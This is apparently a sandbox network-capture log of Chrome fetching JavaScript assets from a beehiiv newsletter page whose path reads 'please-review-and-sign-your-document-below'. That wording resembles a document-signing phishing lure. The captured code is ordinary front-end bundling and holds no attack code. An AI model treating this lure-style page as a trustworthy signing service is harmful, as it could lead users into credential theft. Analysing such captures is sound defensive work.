                                                                                                                                            Data Ascii: ext-sm",children:[r("login.already_a_subscriber"),s.jsxs(n,{to:"/login",className:"ml-1",children:[s.jsx("span",{className:o("underline underline-offset-1",{"text-wt-text-on-background":e!=="subscribe-gate"}),children:r("shared.cta.sign_in")}),"."]})]}),s


                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                            129192.168.2.1649857104.18.69.404436900C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                            2025-01-15 18:14:39 UTC847OUTGET /assets/TwitterEmbed-wIDCDAXa.js HTTP/1.1
                                                                                                                                            Host: kanes-newsletter-871ead.beehiiv.com
                                                                                                                                            Connection: keep-alive
                                                                                                                                            sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                            Origin: https://kanes-newsletter-871ead.beehiiv.com
                                                                                                                                            sec-ch-ua-mobile: ?0
                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                            sec-ch-ua-platform: "Windows"
                                                                                                                                            Accept: */*
                                                                                                                                            Sec-Fetch-Site: same-origin
                                                                                                                                            Sec-Fetch-Mode: cors
                                                                                                                                            Sec-Fetch-Dest: script
                                                                                                                                            Referer: https://kanes-newsletter-871ead.beehiiv.com/p/please-review-and-sign-your-document-below
                                                                                                                                            Accept-Encoding: gzip, deflate, br
                                                                                                                                            Accept-Language: en-US,en;q=0.9
                                                                                                                                            Cookie: __cf_bm=t1Fh0BcpV0SOaArg44wQqvHJ6eOZqrp8ju2X4P9gJ1Q-1736964871-1.0.1.1-8msfSrG.4jE02ExjAY2XvlEHJYje6PKQiLD3pDhYWiVzx8VaW4mRZex8mRH1GKAMiAw3TiXfeTt4v72pcM1HFQ
                                                                                                                                            2025-01-15 18:14:39 UTC913INHTTP/1.1 200 OK
                                                                                                                                            Date: Wed, 15 Jan 2025 18:14:39 GMT
                                                                                                                                            Content-Type: application/javascript; charset=UTF-8
                                                                                                                                            Content-Length: 9596
                                                                                                                                            Connection: close
                                                                                                                                            Report-To: {"group":"heroku-nel","max_age":3600,"endpoints":[{"url":"https://nel.heroku.com/reports?ts=1736960704&sid=1b10b0ff-8a76-4548-befa-353fc6c6c045&s=ZSTm5tjtoUyepT8GE0uMWa%2BNcCEepGTOSPZjUVss40E%3D"}]}
                                                                                                                                            Reporting-Endpoints: heroku-nel=https://nel.heroku.com/reports?ts=1736960704&sid=1b10b0ff-8a76-4548-befa-353fc6c6c045&s=ZSTm5tjtoUyepT8GE0uMWa%2BNcCEepGTOSPZjUVss40E%3D
                                                                                                                                            Nel: {"report_to":"heroku-nel","max_age":3600,"success_fraction":0.005,"failure_fraction":0.05,"response_headers":["Via"]}
                                                                                                                                            Cache-Control: public, max-age=31536000, immutable
                                                                                                                                            Last-Modified: Tue, 24 Dec 2024 16:29:01 GMT
                                                                                                                                            Etag: W/"257c-193f98014c8"
                                                                                                                                            Via: 1.1 vegur, 1.1 vegur
                                                                                                                                            CF-Cache-Status: HIT
                                                                                                                                            Age: 4166
                                                                                                                                            Accept-Ranges: bytes
                                                                                                                                            Server: cloudflare
                                                                                                                                            CF-RAY: 9027d8bf4c2d8c11-EWR
                                                                                                                                            2025-01-15 18:14:39 UTC456INData Raw: 0a 21 66 75 6e 63 74 69 6f 6e 28 29 7b 74 72 79 7b 76 61 72 20 65 3d 22 75 6e 64 65 66 69 6e 65 64 22 21 3d 74 79 70 65 6f 66 20 77 69 6e 64 6f 77 3f 77 69 6e 64 6f 77 3a 22 75 6e 64 65 66 69 6e 65 64 22 21 3d 74 79 70 65 6f 66 20 67 6c 6f 62 61 6c 3f 67 6c 6f 62 61 6c 3a 22 75 6e 64 65 66 69 6e 65 64 22 21 3d 74 79 70 65 6f 66 20 73 65 6c 66 3f 73 65 6c 66 3a 7b 7d 2c 6e 3d 28 6e 65 77 20 45 72 72 6f 72 29 2e 73 74 61 63 6b 3b 6e 26 26 28 65 2e 5f 73 65 6e 74 72 79 44 65 62 75 67 49 64 73 3d 65 2e 5f 73 65 6e 74 72 79 44 65 62 75 67 49 64 73 7c 7c 7b 7d 2c 65 2e 5f 73 65 6e 74 72 79 44 65 62 75 67 49 64 73 5b 6e 5d 3d 22 30 63 30 66 35 39 65 31 2d 63 61 35 64 2d 35 36 31 33 2d 39 62 33 61 2d 36 64 31 65 64 39 30 32 61 36 30 64 22 29 7d 63 61 74 63 68 28
                                                                                                                                            Data Ascii: !function(){try{var e="undefined"!=typeof window?window:"undefined"!=typeof global?global:"undefined"!=typeof self?self:{},n=(new Error).stack;n&&(e._sentryDebugIds=e._sentryDebugIds||{},e._sentryDebugIds[n]="0c0f59e1-ca5d-5613-9b3a-6d1ed902a60d")}catch(
                                                                                                                                            2025-01-15 18:14:39 UTC1369INData Raw: 6f 72 74 7b 4c 20 61 73 20 45 7d 66 72 6f 6d 22 2e 2f 63 6f 6d 70 6f 6e 65 6e 74 73 2d 4f 6a 32 78 4d 66 47 45 2e 6a 73 22 3b 69 6d 70 6f 72 74 7b 46 20 61 73 20 6a 7d 66 72 6f 6d 22 2e 2f 41 72 72 6f 77 4c 65 66 74 49 63 6f 6e 2d 44 7a 39 51 59 78 6e 30 2e 6a 73 22 3b 63 6f 6e 73 74 20 67 3d 7b 69 6e 74 65 72 3a 22 49 6e 74 65 72 22 2c 6c 69 62 72 65 5f 63 61 73 6c 6f 6e 5f 74 65 78 74 3a 22 4c 69 62 72 65 20 43 61 73 6c 6f 6e 20 54 65 78 74 22 2c 73 70 61 63 65 5f 6d 6f 6e 6f 3a 22 53 70 61 63 65 20 4d 6f 6e 6f 22 2c 71 75 69 63 6b 73 61 6e 64 3a 22 51 75 69 63 6b 73 61 6e 64 22 7d 2c 4e 3d 7b 69 6e 74 65 72 3a 7b 66 61 6d 69 6c 79 3a 22 49 6e 74 65 72 22 2c 76 61 72 69 61 6e 74 73 3a 5b 22 31 30 30 22 2c 22 32 30 30 22 2c 22 33 30 30 22 2c 22 72 65 67
                                                                                                                                            Data Ascii: ort{L as E}from"./components-Oj2xMfGE.js";import{F as j}from"./ArrowLeftIcon-Dz9QYxn0.js";const g={inter:"Inter",libre_caslon_text:"Libre Caslon Text",space_mono:"Space Mono",quicksand:"Quicksand"},N={inter:{family:"Inter",variants:["100","200","300","reg
                                                                                                                                            2025-01-15 18:14:39 UTC1369INData Raw: 4b 6d 4d 45 56 75 42 57 59 4d 5a 68 72 69 62 32 42 67 2d 34 2e 74 74 66 22 7d 2c 63 61 74 65 67 6f 72 79 3a 22 73 61 6e 73 2d 73 65 72 69 66 22 2c 6b 69 6e 64 3a 22 77 65 62 66 6f 6e 74 73 23 77 65 62 66 6f 6e 74 22 2c 6d 65 6e 75 3a 22 68 74 74 70 3a 2f 2f 66 6f 6e 74 73 2e 67 73 74 61 74 69 63 2e 63 6f 6d 2f 73 2f 69 6e 74 65 72 2f 76 31 32 2f 55 63 43 4f 33 46 77 72 4b 33 69 4c 54 65 48 75 53 5f 66 76 51 74 4d 77 43 70 35 30 4b 6e 4d 77 32 62 6f 4b 6f 64 75 4b 6d 4d 45 56 75 4c 79 66 41 5a 6c 68 6a 51 2e 74 74 66 22 7d 2c 6c 69 62 72 65 5f 63 61 73 6c 6f 6e 5f 74 65 78 74 3a 7b 66 61 6d 69 6c 79 3a 22 4c 69 62 72 65 20 43 61 73 6c 6f 6e 20 54 65 78 74 22 2c 76 61 72 69 61 6e 74 73 3a 5b 22 72 65 67 75 6c 61 72 22 2c 22 69 74 61 6c 69 63 22 2c 22 37 30
                                                                                                                                            Data Ascii: KmMEVuBWYMZhrib2Bg-4.ttf"},category:"sans-serif",kind:"webfonts#webfont",menu:"http://fonts.gstatic.com/s/inter/v12/UcCO3FwrK3iLTeHuS_fvQtMwCp50KnMw2boKoduKmMEVuLyfAZlhjQ.ttf"},libre_caslon_text:{family:"Libre Caslon Text",variants:["regular","italic","70
                                                                                                                                            2025-01-15 18:14:39 UTC1369INData Raw: 6d 2f 73 2f 71 75 69 63 6b 73 61 6e 64 2f 76 33 30 2f 36 78 4b 2d 64 53 5a 61 4d 39 69 45 38 4b 62 70 52 41 5f 4c 4a 33 7a 38 6d 48 39 42 4f 4a 76 67 6b 42 67 76 31 38 47 30 77 78 34 30 51 44 77 2e 74 74 66 22 7d 2c 63 61 74 65 67 6f 72 79 3a 22 73 61 6e 73 2d 73 65 72 69 66 22 2c 6b 69 6e 64 3a 22 77 65 62 66 6f 6e 74 73 23 77 65 62 66 6f 6e 74 22 2c 6d 65 6e 75 3a 22 68 74 74 70 3a 2f 2f 66 6f 6e 74 73 2e 67 73 74 61 74 69 63 2e 63 6f 6d 2f 73 2f 71 75 69 63 6b 73 61 6e 64 2f 76 33 30 2f 36 78 4b 2d 64 53 5a 61 4d 39 69 45 38 4b 62 70 52 41 5f 4c 4a 33 7a 38 6d 48 39 42 4f 4a 76 67 6b 50 38 6f 35 38 43 2d 78 77 2e 74 74 66 22 7d 2c 73 70 61 63 65 5f 6d 6f 6e 6f 3a 7b 66 61 6d 69 6c 79 3a 22 53 70 61 63 65 20 4d 6f 6e 6f 22 2c 76 61 72 69 61 6e 74 73 3a
                                                                                                                                            Data Ascii: m/s/quicksand/v30/6xK-dSZaM9iE8KbpRA_LJ3z8mH9BOJvgkBgv18G0wx40QDw.ttf"},category:"sans-serif",kind:"webfonts#webfont",menu:"http://fonts.gstatic.com/s/quicksand/v30/6xK-dSZaM9iE8KbpRA_LJ3z8mH9BOJvgkP8o58C-xw.ttf"},space_mono:{family:"Space Mono",variants:
                                                                                                                                            2025-01-15 18:14:39 UTC1369INData Raw: 74 79 70 65 6f 66 20 6e 3d 3d 22 73 74 72 69 6e 67 22 7c 7c 74 79 70 65 6f 66 20 6e 3d 3d 22 6e 75 6d 62 65 72 22 29 72 65 74 75 72 6e 20 6e 3b 69 66 28 74 79 70 65 6f 66 20 6e 21 3d 22 6f 62 6a 65 63 74 22 29 72 65 74 75 72 6e 22 22 3b 69 66 28 41 72 72 61 79 2e 69 73 41 72 72 61 79 28 6e 29 29 72 65 74 75 72 6e 20 73 2e 61 70 70 6c 79 28 6e 75 6c 6c 2c 6e 29 3b 69 66 28 6e 2e 74 6f 53 74 72 69 6e 67 21 3d 3d 4f 62 6a 65 63 74 2e 70 72 6f 74 6f 74 79 70 65 2e 74 6f 53 74 72 69 6e 67 26 26 21 6e 2e 74 6f 53 74 72 69 6e 67 2e 74 6f 53 74 72 69 6e 67 28 29 2e 69 6e 63 6c 75 64 65 73 28 22 5b 6e 61 74 69 76 65 20 63 6f 64 65 5d 22 29 29 72 65 74 75 72 6e 20 6e 2e 74 6f 53 74 72 69 6e 67 28 29 3b 76 61 72 20 72 3d 22 22 3b 66 6f 72 28 76 61 72 20 6c 20 69 6e
                                                                                                                                            Data Ascii: typeof n=="string"||typeof n=="number")return n;if(typeof n!="object")return"";if(Array.isArray(n))return s.apply(null,n);if(n.toString!==Object.prototype.toString&&!n.toString.toString().includes("[native code]"))return n.toString();var r="";for(var l in
                                                                                                                                            2025-01-15 18:14:39 UTC1369INData Raw: 63 6b 67 72 6f 75 6e 64 5f 63 6f 6c 6f 72 2c 63 6f 6c 6f 72 3a 61 3f 2e 74 65 78 74 5f 63 6f 6c 6f 72 2c 62 6f 72 64 65 72 52 61 64 69 75 73 3a 60 24 7b 74 3f 2e 62 75 74 74 6f 6e 5f 62 6f 72 64 65 72 5f 72 61 64 69 75 73 7c 7c 30 7d 70 78 60 7d 2c 63 68 69 6c 64 72 65 6e 3a 5b 6f 2e 6a 73 78 73 28 22 64 69 76 22 2c 7b 63 6c 61 73 73 4e 61 6d 65 3a 53 2c 63 68 69 6c 64 72 65 6e 3a 5b 61 3f 2e 73 68 6f 77 5f 69 6d 61 67 65 26 26 6d 26 26 6f 2e 6a 73 78 28 22 69 6d 67 22 2c 7b 73 72 63 3a 6d 2c 61 6c 74 3a 22 6c 6f 67 6f 22 2c 63 6c 61 73 73 4e 61 6d 65 3a 55 2c 73 74 79 6c 65 3a 7b 62 6f 72 64 65 72 52 61 64 69 75 73 3a 60 24 7b 74 3f 2e 62 75 74 74 6f 6e 5f 62 6f 72 64 65 72 5f 72 61 64 69 75 73 7c 7c 30 7d 70 78 60 2c 6f 76 65 72 66 6c 6f 77 3a 22 68 69
                                                                                                                                            Data Ascii: ckground_color,color:a?.text_color,borderRadius:`${t?.button_border_radius||0}px`},children:[o.jsxs("div",{className:S,children:[a?.show_image&&m&&o.jsx("img",{src:m,alt:"logo",className:U,style:{borderRadius:`${t?.button_border_radius||0}px`,overflow:"hi
                                                                                                                                            2025-01-15 18:14:39 UTC1369INData Raw: 74 69 6f 6e 2e 73 65 61 72 63 68 29 7d 7d 2c 5b 5d 29 2c 6f 2e 6a 73 78 73 28 22 64 69 76 22 2c 7b 63 6c 61 73 73 4e 61 6d 65 3a 22 6d 78 2d 61 75 74 6f 20 6d 62 2d 31 36 20 6d 61 78 2d 77 2d 78 6c 20 73 70 61 63 65 2d 79 2d 34 22 2c 63 68 69 6c 64 72 65 6e 3a 5b 6f 2e 6a 73 78 28 4f 2c 7b 74 68 65 6d 65 3a 73 2e 74 68 65 6d 65 2c 75 72 6c 3a 63 2c 65 6c 65 6d 65 6e 74 3a 7b 74 79 70 65 3a 22 70 61 79 77 61 6c 6c 5f 62 72 65 61 6b 22 2c 61 74 74 72 73 3a 7b 69 64 3a 73 2e 69 64 2c 64 61 74 61 3a 7b 74 69 74 6c 65 3a 73 2e 74 69 74 6c 65 2c 64 65 73 63 72 69 70 74 69 6f 6e 3a 73 2e 64 65 73 63 72 69 70 74 69 6f 6e 2c 63 74 61 5f 74 65 78 74 3a 73 2e 63 74 61 5f 74 65 78 74 2c 62 65 6e 65 66 69 74 73 3a 73 2e 62 65 6e 65 66 69 74 73 2c 73 75 62 68 65 61 64
                                                                                                                                            Data Ascii: tion.search)}},[]),o.jsxs("div",{className:"mx-auto mb-16 max-w-xl space-y-4",children:[o.jsx(O,{theme:s.theme,url:c,element:{type:"paywall_break",attrs:{id:s.id,data:{title:s.title,description:s.description,cta_text:s.cta_text,benefits:s.benefits,subhead
                                                                                                                                            2025-01-15 18:14:39 UTC926INData Raw: 6d 65 6e 74 3f 2e 68 65 61 64 3f 2e 72 65 6d 6f 76 65 43 68 69 6c 64 28 74 29 7d 7d 2c 5b 65 2c 69 5d 29 7d 2c 4a 3d 28 65 2c 69 29 3d 3e 7b 64 2e 75 73 65 45 66 66 65 63 74 28 28 29 3d 3e 7b 63 6f 6e 73 74 20 73 3d 64 6f 63 75 6d 65 6e 74 2e 67 65 74 45 6c 65 6d 65 6e 74 42 79 49 64 28 22 23 63 6f 6e 74 65 6e 74 2d 62 6c 6f 63 6b 73 22 29 3b 77 69 6e 64 6f 77 2e 74 77 74 74 72 3f 2e 77 69 64 67 65 74 73 3f 2e 6c 6f 61 64 28 73 29 7d 2c 5b 65 2c 69 5d 29 7d 2c 7a 3d 28 7b 68 74 6d 6c 3a 65 2c 73 6c 75 67 3a 69 2c 75 70 64 61 74 65 3a 73 3d 21 30 7d 29 3d 3e 28 47 28 69 2c 73 29 2c 4a 28 69 2c 73 29 2c 51 28 69 2c 73 29 2c 6f 2e 6a 73 78 28 22 64 69 76 22 2c 7b 73 75 70 70 72 65 73 73 48 79 64 72 61 74 69 6f 6e 57 61 72 6e 69 6e 67 3a 21 30 2c 64 61 6e 67
                                                                                                                                            Data Ascii: ment?.head?.removeChild(t)}},[e,i])},J=(e,i)=>{d.useEffect(()=>{const s=document.getElementById("#content-blocks");window.twttr?.widgets?.load(s)},[e,i])},z=({html:e,slug:i,update:s=!0})=>(G(i,s),J(i,s),Q(i,s),o.jsx("div",{suppressHydrationWarning:!0,dang


                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                            130192.168.2.1649856104.18.68.404436900C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                            2025-01-15 18:14:39 UTC554OUTGET /assets/CheckIcon-681VH8qr.js HTTP/1.1
                                                                                                                                            Host: kanes-newsletter-871ead.beehiiv.com
                                                                                                                                            Connection: keep-alive
                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                            Accept: */*
                                                                                                                                            Sec-Fetch-Site: none
                                                                                                                                            Sec-Fetch-Mode: cors
                                                                                                                                            Sec-Fetch-Dest: empty
                                                                                                                                            Accept-Encoding: gzip, deflate, br
                                                                                                                                            Accept-Language: en-US,en;q=0.9
                                                                                                                                            Cookie: __cf_bm=t1Fh0BcpV0SOaArg44wQqvHJ6eOZqrp8ju2X4P9gJ1Q-1736964871-1.0.1.1-8msfSrG.4jE02ExjAY2XvlEHJYje6PKQiLD3pDhYWiVzx8VaW4mRZex8mRH1GKAMiAw3TiXfeTt4v72pcM1HFQ
                                                                                                                                            2025-01-15 18:14:39 UTC900INHTTP/1.1 200 OK
                                                                                                                                            Date: Wed, 15 Jan 2025 18:14:39 GMT
                                                                                                                                            Content-Type: application/javascript; charset=UTF-8
                                                                                                                                            Content-Length: 838
                                                                                                                                            Connection: close
                                                                                                                                            Report-To: {"group":"heroku-nel","max_age":3600,"endpoints":[{"url":"https://nel.heroku.com/reports?ts=1736957252&sid=1b10b0ff-8a76-4548-befa-353fc6c6c045&s=xQ8MxGvNU7EE0iKm%2FA5pFUt0PxZ0aoksaPCLdkAW27I%3D"}]}
                                                                                                                                            Reporting-Endpoints: heroku-nel=https://nel.heroku.com/reports?ts=1736957252&sid=1b10b0ff-8a76-4548-befa-353fc6c6c045&s=xQ8MxGvNU7EE0iKm%2FA5pFUt0PxZ0aoksaPCLdkAW27I%3D
                                                                                                                                            Nel: {"report_to":"heroku-nel","max_age":3600,"success_fraction":0.005,"failure_fraction":0.05,"response_headers":["Via"]}
                                                                                                                                            Cache-Control: public, max-age=31536000, immutable
                                                                                                                                            Last-Modified: Tue, 24 Dec 2024 16:29:01 GMT
                                                                                                                                            Etag: W/"346-193f98014c8"
                                                                                                                                            Via: 1.1 vegur, 1.1 vegur
                                                                                                                                            CF-Cache-Status: HIT
                                                                                                                                            Accept-Ranges: bytes
                                                                                                                                            Server: cloudflare
                                                                                                                                            CF-RAY: 9027d8bf5d2d0cc6-EWR
                                                                                                                                            2025-01-15 18:14:39 UTC469INData Raw: 0a 21 66 75 6e 63 74 69 6f 6e 28 29 7b 74 72 79 7b 76 61 72 20 65 3d 22 75 6e 64 65 66 69 6e 65 64 22 21 3d 74 79 70 65 6f 66 20 77 69 6e 64 6f 77 3f 77 69 6e 64 6f 77 3a 22 75 6e 64 65 66 69 6e 65 64 22 21 3d 74 79 70 65 6f 66 20 67 6c 6f 62 61 6c 3f 67 6c 6f 62 61 6c 3a 22 75 6e 64 65 66 69 6e 65 64 22 21 3d 74 79 70 65 6f 66 20 73 65 6c 66 3f 73 65 6c 66 3a 7b 7d 2c 6e 3d 28 6e 65 77 20 45 72 72 6f 72 29 2e 73 74 61 63 6b 3b 6e 26 26 28 65 2e 5f 73 65 6e 74 72 79 44 65 62 75 67 49 64 73 3d 65 2e 5f 73 65 6e 74 72 79 44 65 62 75 67 49 64 73 7c 7c 7b 7d 2c 65 2e 5f 73 65 6e 74 72 79 44 65 62 75 67 49 64 73 5b 6e 5d 3d 22 61 61 37 66 38 66 39 61 2d 66 37 61 33 2d 35 31 32 64 2d 39 32 35 66 2d 38 33 38 30 63 35 64 66 32 32 65 33 22 29 7d 63 61 74 63 68 28
                                                                                                                                            Data Ascii: !function(){try{var e="undefined"!=typeof window?window:"undefined"!=typeof global?global:"undefined"!=typeof self?self:{},n=(new Error).stack;n&&(e._sentryDebugIds=e._sentryDebugIds||{},e._sentryDebugIds[n]="aa7f8f9a-f7a3-512d-925f-8380c5df22e3")}catch(
                                                                                                                                            2025-01-15 18:14:39 UTC369INData Raw: 2c 73 74 72 6f 6b 65 3a 22 63 75 72 72 65 6e 74 43 6f 6c 6f 72 22 2c 22 61 72 69 61 2d 68 69 64 64 65 6e 22 3a 22 74 72 75 65 22 2c 22 64 61 74 61 2d 73 6c 6f 74 22 3a 22 69 63 6f 6e 22 2c 72 65 66 3a 6e 2c 22 61 72 69 61 2d 6c 61 62 65 6c 6c 65 64 62 79 22 3a 74 7d 2c 6f 29 2c 72 3f 65 2e 63 72 65 61 74 65 45 6c 65 6d 65 6e 74 28 22 74 69 74 6c 65 22 2c 7b 69 64 3a 74 7d 2c 72 29 3a 6e 75 6c 6c 2c 65 2e 63 72 65 61 74 65 45 6c 65 6d 65 6e 74 28 22 70 61 74 68 22 2c 7b 73 74 72 6f 6b 65 4c 69 6e 65 63 61 70 3a 22 72 6f 75 6e 64 22 2c 73 74 72 6f 6b 65 4c 69 6e 65 6a 6f 69 6e 3a 22 72 6f 75 6e 64 22 2c 64 3a 22 6d 34 2e 35 20 31 32 2e 37 35 20 36 20 36 20 39 2d 31 33 2e 35 22 7d 29 29 7d 63 6f 6e 73 74 20 69 3d 65 2e 66 6f 72 77 61 72 64 52 65 66 28 61 29
                                                                                                                                            Data Ascii: ,stroke:"currentColor","aria-hidden":"true","data-slot":"icon",ref:n,"aria-labelledby":t},o),r?e.createElement("title",{id:t},r):null,e.createElement("path",{strokeLinecap:"round",strokeLinejoin:"round",d:"m4.5 12.75 6 6 9-13.5"}))}const i=e.forwardRef(a)


                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                            131192.168.2.1649858104.18.68.404436900C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                            2025-01-15 18:14:39 UTC563OUTGET /assets/useTypedLoaderData-Bk1_tu68.js HTTP/1.1
                                                                                                                                            Host: kanes-newsletter-871ead.beehiiv.com
                                                                                                                                            Connection: keep-alive
                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                            Accept: */*
                                                                                                                                            Sec-Fetch-Site: none
                                                                                                                                            Sec-Fetch-Mode: cors
                                                                                                                                            Sec-Fetch-Dest: empty
                                                                                                                                            Accept-Encoding: gzip, deflate, br
                                                                                                                                            Accept-Language: en-US,en;q=0.9
                                                                                                                                            Cookie: __cf_bm=t1Fh0BcpV0SOaArg44wQqvHJ6eOZqrp8ju2X4P9gJ1Q-1736964871-1.0.1.1-8msfSrG.4jE02ExjAY2XvlEHJYje6PKQiLD3pDhYWiVzx8VaW4mRZex8mRH1GKAMiAw3TiXfeTt4v72pcM1HFQ
                                                                                                                                            2025-01-15 18:14:39 UTC896INHTTP/1.1 200 OK
                                                                                                                                            Date: Wed, 15 Jan 2025 18:14:39 GMT
                                                                                                                                            Content-Type: application/javascript; charset=UTF-8
                                                                                                                                            Content-Length: 446
                                                                                                                                            Connection: close
                                                                                                                                            Report-To: {"group":"heroku-nel","max_age":3600,"endpoints":[{"url":"https://nel.heroku.com/reports?ts=1736960861&sid=1b10b0ff-8a76-4548-befa-353fc6c6c045&s=hHLBEjQm0xlERnAPrG1PQ0dvpjfhy47dIXqgXlIETkk%3D"}]}
                                                                                                                                            Reporting-Endpoints: heroku-nel=https://nel.heroku.com/reports?ts=1736960861&sid=1b10b0ff-8a76-4548-befa-353fc6c6c045&s=hHLBEjQm0xlERnAPrG1PQ0dvpjfhy47dIXqgXlIETkk%3D
                                                                                                                                            Nel: {"report_to":"heroku-nel","max_age":3600,"success_fraction":0.005,"failure_fraction":0.05,"response_headers":["Via"]}
                                                                                                                                            Cache-Control: public, max-age=31536000, immutable
                                                                                                                                            Last-Modified: Tue, 24 Dec 2024 16:29:01 GMT
                                                                                                                                            Etag: W/"1be-193f98014c8"
                                                                                                                                            Via: 1.1 vegur, 1.1 vegur
                                                                                                                                            CF-Cache-Status: HIT
                                                                                                                                            Accept-Ranges: bytes
                                                                                                                                            Server: cloudflare
                                                                                                                                            CF-RAY: 9027d8bf7cbc8cbd-EWR
                                                                                                                                            2025-01-15 18:14:39 UTC446INData Raw: 0a 21 66 75 6e 63 74 69 6f 6e 28 29 7b 74 72 79 7b 76 61 72 20 65 3d 22 75 6e 64 65 66 69 6e 65 64 22 21 3d 74 79 70 65 6f 66 20 77 69 6e 64 6f 77 3f 77 69 6e 64 6f 77 3a 22 75 6e 64 65 66 69 6e 65 64 22 21 3d 74 79 70 65 6f 66 20 67 6c 6f 62 61 6c 3f 67 6c 6f 62 61 6c 3a 22 75 6e 64 65 66 69 6e 65 64 22 21 3d 74 79 70 65 6f 66 20 73 65 6c 66 3f 73 65 6c 66 3a 7b 7d 2c 6e 3d 28 6e 65 77 20 45 72 72 6f 72 29 2e 73 74 61 63 6b 3b 6e 26 26 28 65 2e 5f 73 65 6e 74 72 79 44 65 62 75 67 49 64 73 3d 65 2e 5f 73 65 6e 74 72 79 44 65 62 75 67 49 64 73 7c 7c 7b 7d 2c 65 2e 5f 73 65 6e 74 72 79 44 65 62 75 67 49 64 73 5b 6e 5d 3d 22 37 33 64 30 38 61 39 66 2d 61 30 30 38 2d 35 64 31 36 2d 38 35 31 31 2d 30 38 37 65 30 31 36 63 65 64 34 62 22 29 7d 63 61 74 63 68 28
                                                                                                                                            Data Ascii: !function(){try{var e="undefined"!=typeof window?window:"undefined"!=typeof global?global:"undefined"!=typeof self?self:{},n=(new Error).stack;n&&(e._sentryDebugIds=e._sentryDebugIds||{},e._sentryDebugIds[n]="73d08a9f-a008-5d16-8511-087e016ced4b")}catch(


                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                            132192.168.2.1649859104.18.68.404436900C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                            2025-01-15 18:14:39 UTC570OUTGET /assets/useWebBuilderCommunicator-DoXoLq6Y.js HTTP/1.1
                                                                                                                                            Host: kanes-newsletter-871ead.beehiiv.com
                                                                                                                                            Connection: keep-alive
                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                            Accept: */*
                                                                                                                                            Sec-Fetch-Site: none
                                                                                                                                            Sec-Fetch-Mode: cors
                                                                                                                                            Sec-Fetch-Dest: empty
                                                                                                                                            Accept-Encoding: gzip, deflate, br
                                                                                                                                            Accept-Language: en-US,en;q=0.9
                                                                                                                                            Cookie: __cf_bm=t1Fh0BcpV0SOaArg44wQqvHJ6eOZqrp8ju2X4P9gJ1Q-1736964871-1.0.1.1-8msfSrG.4jE02ExjAY2XvlEHJYje6PKQiLD3pDhYWiVzx8VaW4mRZex8mRH1GKAMiAw3TiXfeTt4v72pcM1HFQ
                                                                                                                                            2025-01-15 18:14:39 UTC901INHTTP/1.1 200 OK
                                                                                                                                            Date: Wed, 15 Jan 2025 18:14:39 GMT
                                                                                                                                            Content-Type: application/javascript; charset=UTF-8
                                                                                                                                            Content-Length: 1035
                                                                                                                                            Connection: close
                                                                                                                                            Report-To: {"group":"heroku-nel","max_age":3600,"endpoints":[{"url":"https://nel.heroku.com/reports?ts=1736957252&sid=1b10b0ff-8a76-4548-befa-353fc6c6c045&s=xQ8MxGvNU7EE0iKm%2FA5pFUt0PxZ0aoksaPCLdkAW27I%3D"}]}
                                                                                                                                            Reporting-Endpoints: heroku-nel=https://nel.heroku.com/reports?ts=1736957252&sid=1b10b0ff-8a76-4548-befa-353fc6c6c045&s=xQ8MxGvNU7EE0iKm%2FA5pFUt0PxZ0aoksaPCLdkAW27I%3D
                                                                                                                                            Nel: {"report_to":"heroku-nel","max_age":3600,"success_fraction":0.005,"failure_fraction":0.05,"response_headers":["Via"]}
                                                                                                                                            Cache-Control: public, max-age=31536000, immutable
                                                                                                                                            Last-Modified: Tue, 24 Dec 2024 16:29:01 GMT
                                                                                                                                            Etag: W/"40b-193f98014c8"
                                                                                                                                            Via: 1.1 vegur, 1.1 vegur
                                                                                                                                            CF-Cache-Status: HIT
                                                                                                                                            Accept-Ranges: bytes
                                                                                                                                            Server: cloudflare
                                                                                                                                            CF-RAY: 9027d8bfcd874392-EWR
                                                                                                                                            2025-01-15 18:14:39 UTC468INData Raw: 0a 21 66 75 6e 63 74 69 6f 6e 28 29 7b 74 72 79 7b 76 61 72 20 65 3d 22 75 6e 64 65 66 69 6e 65 64 22 21 3d 74 79 70 65 6f 66 20 77 69 6e 64 6f 77 3f 77 69 6e 64 6f 77 3a 22 75 6e 64 65 66 69 6e 65 64 22 21 3d 74 79 70 65 6f 66 20 67 6c 6f 62 61 6c 3f 67 6c 6f 62 61 6c 3a 22 75 6e 64 65 66 69 6e 65 64 22 21 3d 74 79 70 65 6f 66 20 73 65 6c 66 3f 73 65 6c 66 3a 7b 7d 2c 6e 3d 28 6e 65 77 20 45 72 72 6f 72 29 2e 73 74 61 63 6b 3b 6e 26 26 28 65 2e 5f 73 65 6e 74 72 79 44 65 62 75 67 49 64 73 3d 65 2e 5f 73 65 6e 74 72 79 44 65 62 75 67 49 64 73 7c 7c 7b 7d 2c 65 2e 5f 73 65 6e 74 72 79 44 65 62 75 67 49 64 73 5b 6e 5d 3d 22 66 64 37 37 64 31 38 35 2d 36 64 36 65 2d 35 35 35 35 2d 62 32 30 31 2d 30 37 30 64 34 65 36 31 63 64 37 32 22 29 7d 63 61 74 63 68 28
